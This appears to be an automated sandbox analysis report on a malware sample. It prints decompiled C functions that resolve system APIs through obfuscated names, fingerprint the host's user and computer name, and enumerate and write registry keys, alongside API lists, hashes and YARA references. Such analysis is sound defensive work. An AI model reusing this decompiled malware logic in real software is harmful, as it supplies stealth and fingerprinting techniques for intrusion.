            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
            • String ID:
            • API String ID: 3369646462-0
            • Opcode ID: 319c4360991fd5d5381f72ef35efb0cec235ba4b182298889f4fa90012b0ee71
            • Instruction ID: cd32cb3de9d2b33a0b1b338b5ffa7a6441be68a4849fe0743e59becbe5861332
            • Opcode Fuzzy Hash: 319c4360991fd5d5381f72ef35efb0cec235ba4b182298889f4fa90012b0ee71
            • Instruction Fuzzy Hash: 16311CB5D01389EFDB20DFA6CC8499EBBB8EB4C300F1049B9E702A6151D779AA449F50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E3A63 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 007E3ABD
            • SysAllocString.OLEAUT32(0070006F), ref: 007E3AD1
            • SysAllocString.OLEAUT32(00000000), ref: 007E3AE3
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B4B
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B5A
            • SysFreeString.OLEAUT32(00000000), ref: 007E3B65
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 5e6ceffe5572ebd5dfcd5f578137accd954393b51287fd38986cb42292500fe1
            • Instruction ID: 9ccb973c6f9d16ac4498b0589d339262cb79f70b8c05e1673e3ba001718a9280
            • Opcode Fuzzy Hash: 5e6ceffe5572ebd5dfcd5f578137accd954393b51287fd38986cb42292500fe1
            • Instruction Fuzzy Hash: AE419F76D01649ABDF01DFBDC848A9EB7BAEF49300F108466EA11EB120DA75DE05CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E6BF9 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E007E33DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x7ea348; // 0x272d5a8
					_t1 = _t23 + 0x7eb436; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x7ea348; // 0x272d5a8
					_t2 = _t26 + 0x7eb85c; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E007E61DA(_t54);
					} else {
						_t30 =  *0x7ea348; // 0x272d5a8
						_t5 = _t30 + 0x7eb849; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x7ea348; // 0x272d5a8
							_t7 = _t33 + 0x7eb72b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x7ea348; // 0x272d5a8
								_t9 = _t36 + 0x7eb883; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x7ea348; // 0x272d5a8
									_t11 = _t39 + 0x7eb87b; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E007E7A08(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















            0x007e6c08
            0x007e6c0c
            0x007e6cce
            0x007e6c12
            0x007e6c12
            0x007e6c17
            0x007e6c2a
            0x007e6c2c
            0x007e6c31
            0x007e6c39
            0x007e6c40
            0x007e6c42
            0x007e6c47
            0x007e6cc6
            0x007e6cc7
            0x007e6c49
            0x007e6c49
            0x007e6c4e
            0x007e6c56
            0x007e6c58
            0x007e6c5d
            0x00000000
            0x007e6c5f
            0x007e6c5f
            0x007e6c64
            0x007e6c6c
            0x007e6c6e
            0x007e6c73
            0x00000000
            0x007e6c75
            0x007e6c75
            0x007e6c7a
            0x007e6c82
            0x007e6c84
            0x007e6c89
            0x00000000
            0x007e6c8b
            0x007e6c8b
            0x007e6c90
            0x007e6c98
            0x007e6c9a
            0x007e6c9f
            0x00000000
            0x007e6ca1
            0x007e6ca7
            0x007e6cac
            0x007e6cb3
            0x007e6cb8
            0x007e6cbd
            0x00000000
            0x007e6cbf
            0x007e6cc2
            0x007e6cc2
            0x007e6cbd
            0x007e6c9f
            0x007e6c89
            0x007e6c73
            0x007e6c5d
            0x007e6c47
            0x007e6cdc

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,007E37FB,?,?,?,?,00000000,00000000), ref: 007E6C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 007E6C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 007E6C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 007E6C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 007E6C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 007E6C98
              • Part of subcall function 007E7A08: memset.NTDLL ref: 007E7A87
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 69174d3615b23cd64e6f128ee78b661800127f2160f972c41148052cc468eac8
            • Instruction ID: e770b552cf830dc0ea7a75536ccef518fc38cf75710369cdfb08fd28a8e26831
            • Opcode Fuzzy Hash: 69174d3615b23cd64e6f128ee78b661800127f2160f972c41148052cc468eac8
            • Instruction Fuzzy Hash: 72214DB160278AAFD710DF6ACD84E6ABBECEB1C3407104565E545CB221E77CE908CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E1340 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E1340() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x7491c742
						_v12 = _v12 + _t11;
						_t64 = E007E33DC(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E007E61DA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x7e3e01
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















            0x007e134e
            0x007e1351
            0x007e1354
            0x007e135a
            0x007e135f
            0x007e1365
            0x007e136d
            0x007e1370
            0x007e1376
            0x007e137b
            0x007e1384
            0x007e1388
            0x007e1395
            0x007e1399
            0x007e139b
            0x007e139f
            0x007e13a2
            0x007e13b2
            0x007e1405
            0x007e1406
            0x007e13b4
            0x007e13b9
            0x007e13ba
            0x007e13bf
            0x007e13c2
            0x007e13d5
            0x00000000
            0x007e13d7
            0x007e13da
            0x007e13df
            0x007e13ed
            0x007e13f0
            0x007e13f6
            0x007e13fb
            0x00000000
            0x007e13fd
            0x007e13fd
            0x007e1400
            0x007e1400
            0x007e13fb
            0x007e13d5
            0x007e140b
            0x007e140c
            0x007e137b
            0x007e1412

            APIs
            • GetUserNameW.ADVAPI32(00000000,007E3DFF), ref: 007E1354
            • GetComputerNameW.KERNEL32(00000000,007E3DFF), ref: 007E1370
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetUserNameW.ADVAPI32(00000000,007E3DFF), ref: 007E13AA
            • GetComputerNameW.KERNEL32(007E3DFF,7491C740), ref: 007E13CD
            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,007E3DFF,00000000,007E3E01,00000000,00000000,?,7491C740,007E3DFF), ref: 007E13F0
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
            • String ID:
            • API String ID: 3850880919-0
            • Opcode ID: 35af9f6a86b64b12ebd07ebe699142152ccc52a774747fb44ce7f241cd5722f3
            • Instruction ID: 9b3d355368f4ac240a7389a55ff3ff2630dfa6e276cf00fbf3d223ae2e327c35
            • Opcode Fuzzy Hash: 35af9f6a86b64b12ebd07ebe699142152ccc52a774747fb44ce7f241cd5722f3
            • Instruction Fuzzy Hash: 8A210AB6901188FFCB11DFE6C985CEEBBB8EF48304B5044AAE501E7240DB34AB45DB25
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00781817 Relevance: 7.6, APIs: 5, Instructions: 81filetimeCOMMON
            Download Yara Rule
            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 00781824
            • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 00781884
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0078167F,0000000A), ref: 007818AF
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 007818D0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0078167F,0000000A,?,?), ref: 007818D8
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
            • String ID:
            • API String ID: 2685682793-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: 21ab0d429037ccb12cd0b497fd0edb0e0b958b20af2803eb9db7002a8ab51c0f
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 9921A7B2A40208BFD710BFA4DC89EAE7BBDEB443A1F514135FA05E7190D6349D46CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E54D8 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E007E54D8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x7ea30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x7ea2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x7ea2f8 = _t6;
					 *0x7ea304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x7ea2f4 = _t7;
					if(_t7 == 0) {
						 *0x7ea2f4 =  *0x7ea2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









            0x007e54e0
            0x007e54e6
            0x007e54ed
            0x00000000
            0x007e5547
            0x007e54ef
            0x007e54f7
            0x007e5504
            0x007e5504
            0x007e5544
            0x00000000
            0x007e5544
            0x007e5506
            0x007e5506
            0x007e550b
            0x007e551d
            0x007e5522
            0x007e5528
            0x007e552e
            0x007e5535
            0x007e5537
            0x007e5537
            0x00000000
            0x007e553e
            0x007e5500
            0x00000000
            0x00000000
            0x007e5502
            0x00000000

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,007E5037,?), ref: 007E54E0
            • GetVersion.KERNEL32 ref: 007E54EF
            • GetCurrentProcessId.KERNEL32 ref: 007E550B
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 007E5528
            • GetLastError.KERNEL32 ref: 007E5547
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
            • String ID:
            • API String ID: 2270775618-0
            • Opcode ID: 40dc1932563ac8d47a57b2b3b237178149e3f0dbd7512b2caaa15e090d0bc827
            • Instruction ID: 7ed095a981f0d647e4a193dfb8d781eff9494bd5ea440d1212bac2cb543ccdf8
            • Opcode Fuzzy Hash: 40dc1932563ac8d47a57b2b3b237178149e3f0dbd7512b2caaa15e090d0bc827
            • Instruction Fuzzy Hash: F6F0A4B45437C7ABD7208B21AC99B143B67B74C759F608419E713DE1E0E67C94A0CB1E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00782048 Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON
            Download Yara Rule
            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00782052
            • GetModuleHandleA.KERNEL32(00000000), ref: 00782062
            • GetCommandLineW.KERNEL32 ref: 0078206D
              • Part of subcall function 00781C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00781C8D
              • Part of subcall function 00781C58: Sleep.KERNEL32(00000000,00000030), ref: 00781CD4
              • Part of subcall function 00781C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00781CFC
              • Part of subcall function 00781C58: GetSystemDefaultUILanguage.KERNEL32 ref: 00781D06
              • Part of subcall function 00781C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00781D19
            • HeapDestroy.KERNEL32 ref: 00782080
            • ExitProcess.KERNEL32 ref: 00782087
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
            • String ID:
            • API String ID: 1393419808-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: 2c1dc281cd68b136931425359af50efa56f5214acc19ff5f76cbe7a0aa80d4c7
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 56E0B6B0843220ABC3216F71BE0CA4E7E2CBB59B537000535F605F2125CB384A41CBAC
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E4C94 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 167stringCOMMON
            Download Yara Rule
            C-Code - Quality: 88%
            			E007E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x7ea3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E007E6536( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E007E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E007E61DA(_a8);
						goto L29;
					}
					_t64 =  *0x7ea318; // 0x2f19e40
					_t16 = _t64 + 0xc; // 0x2f19f62
					_t65 = E007E6536(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d007e90
						if(E007E7767(_t97,  *_t33, _t91, _a8,  *0x7ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x7ea348; // 0x272d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x7ebb5a; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x7ebbac; // 0x55434b48
								_t69 = _t34;
							}
							if(E007E7238(_t69,  *0x7ea3d4,  *0x7ea3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x7ea348; // 0x272d5a8
									_t44 = _t71 + 0x7eb332; // 0x74666f53
									_t73 = E007E6536(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d007e90
										E007E5B0E( *_t47, _t91, _a8,  *0x7ea3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d007e90
										E007E5B0E( *_t49, _t91, _t99,  *0x7ea3d0, _a16);
										E007E61DA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d007e90
									E007E5B0E( *_t40, _t91, _a8,  *0x7ea3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d007e90
									E007E5B0E( *_t43, _t91, _a8,  *0x7ea3d0, _a16);
								}
								if( *_t101 != 0) {
									E007E61DA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d007e90
					_t81 = E007E58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d007e90
							E007E7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E007E61DA(_t100);
						_t98 = _a16;
					}
					E007E61DA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E007E7AB0(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x7ea3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























            0x007e4c94
            0x007e4c9d
            0x007e4ca4
            0x007e4ca9
            0x007e4d16
            0x007e4d1c
            0x007e4d21
            0x007e4d28
            0x007e4d2d
            0x007e4d32
            0x007e4e9d
            0x007e4ea4
            0x007e4ea4
            0x007e4ea9
            0x007e4eab
            0x007e4eab
            0x007e4eb4
            0x007e4eb4
            0x007e4d38
            0x007e4d44
            0x007e4e93
            0x007e4e96
            0x00000000
            0x007e4e96
            0x007e4d4a
            0x007e4d4f
            0x007e4d52
            0x007e4d57
            0x007e4d5c
            0x007e4da5
            0x007e4da5
            0x007e4db8
            0x007e4dc2
            0x007e4dc8
            0x007e4dcf
            0x007e4dd9
            0x007e4dd9
            0x007e4dd1
            0x007e4dd1
            0x007e4dd1
            0x007e4dd1
            0x007e4dfb
            0x007e4e03
            0x007e4e31
            0x007e4e36
            0x007e4e3d
            0x007e4e42
            0x007e4e46
            0x007e4e78
            0x007e4e48
            0x007e4e55
            0x007e4e58
            0x007e4e68
            0x007e4e6b
            0x007e4e71
            0x007e4e71
            0x007e4e05
            0x007e4e12
            0x007e4e15
            0x007e4e27
            0x007e4e2a
            0x007e4e2a
            0x007e4e82
            0x007e4e8e
            0x007e4e84
            0x007e4e87
            0x007e4e87
            0x007e4e82
            0x007e4dfb
            0x00000000
            0x007e4dc2
            0x007e4d6b
            0x007e4d6e
            0x007e4d75
            0x007e4d7b
            0x007e4d7e
            0x007e4d80
            0x007e4d8c
            0x007e4d8f
            0x007e4d8f
            0x007e4d95
            0x007e4d9a
            0x007e4d9a
            0x007e4da0
            0x00000000
            0x007e4da0
            0x007e4cae
            0x00000000
            0x007e4cd5
            0x007e4cd5
            0x007e4ce1
            0x007e4cf4
            0x007e4cfa
            0x007e4d02
            0x00000000
            0x007e4d02

            APIs
            • StrChrA.SHLWAPI(?,0000005F,00000000,00000000,00000104), ref: 007E4CC7
            • lstrcpy.KERNEL32(?,?), ref: 007E4CF4
              • Part of subcall function 007E6536: lstrlen.KERNEL32(?,00000000,02F19E40,00000000,007E6F0A,02F1A063,43175AC3,?,?,?,?,43175AC3,00000005,007EA00C,4D283A53,?), ref: 007E653D
              • Part of subcall function 007E6536: mbstowcs.NTDLL ref: 007E6566
              • Part of subcall function 007E6536: memset.NTDLL ref: 007E6578
              • Part of subcall function 007E5B0E: lstrlenW.KERNEL32(?,?,?,007E4E5D,3D007E90,80000002,?,007E57D1,74666F53,4D4C4B48,007E57D1,?,3D007E90,80000002,?,?), ref: 007E5B33
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            • lstrcpy.KERNEL32(?,00000000), ref: 007E4D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: vj~
            • API String ID: 3924217599-2274497254
            • Opcode ID: 8d07e6d61c795589faccb5dc24f528b9388a19a1fbdcd91583735fc4487adfc5
            • Instruction ID: 988f6e7e5b469c0a6145c792f31322db9ddb28f97b25e4473f31318ba897dde6
            • Opcode Fuzzy Hash: 8d07e6d61c795589faccb5dc24f528b9388a19a1fbdcd91583735fc4487adfc5
            • Instruction Fuzzy Hash: 6A517C72102289FFDF129F66DC84EAA3BBAFF0C344F008518FA1196161D739E925EB11
            Uniqueness

            Uniqueness Score: -1.00%

            Function 007E5704 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 98synchronizationCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E007E5704(void* __ecx, char _a4) {
				char _v8;
				char _v12;
				long _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t35;
				intOrPtr _t47;
				void* _t51;
				void* _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t53 =  *0x7ea0f4(0x80000003, 0, 0, 0x20019,  &_v32);
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E007E33DC(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					 *0x7ea0d4(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_t10 =  &_v12; // 0x7e6a76
					_v12 = 0x104;
					_t53 =  *0x7ea0f8(_v32, _v8, _v28, _t10, 0, 0, 0, 0);
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E007E61DA(_v28);
							goto L17;
						}
						_t24 =  &_a4; // 0x7e6a76
						_t53 = E007E4C94(_t51, _v32, _v28, _v24, _v12,  &_v8,  *_t24);
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E007E61DA(_v24);
						_v20 = _v16;
						_t47 = E007E33DC(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x7ea30c, 0) == 0x102);
				goto L16;
			}














            0x007e5704
            0x007e571e
            0x007e5721
            0x007e5724
            0x007e5727
            0x007e5730
            0x007e5734
            0x007e580e
            0x007e5812
            0x007e5812
            0x007e573d
            0x007e5744
            0x007e5749
            0x007e574e
            0x007e5803
            0x007e5806
            0x00000000
            0x007e580c
            0x007e5754
            0x007e5757
            0x007e575e
            0x007e5761
            0x007e5768
            0x007e5777
            0x007e577f
            0x007e57b7
            0x007e57f1
            0x007e57f7
            0x007e57f9
            0x007e57f9
            0x007e57fb
            0x007e57fe
            0x00000000
            0x007e57fe
            0x007e57b9
            0x007e57d1
            0x007e57d5
            0x00000000
            0x00000000
            0x00000000
            0x007e57d5
            0x007e5784
            0x007e5793
            0x00000000
            0x00000000
            0x007e5798
            0x007e57a1
            0x007e57a4
            0x007e57a9
            0x007e57ae
            0x007e5789
            0x007e5789
            0x00000000
            0x007e5789
            0x007e57b2
            0x00000000
            0x007e57b2
            0x007e5786
            0x00000000
            0x007e57d7
            0x007e57e4
            0x00000000

            APIs
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,00000000,vj~,?,?,?,?,?,007E6A76,?), ref: 007E57DE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
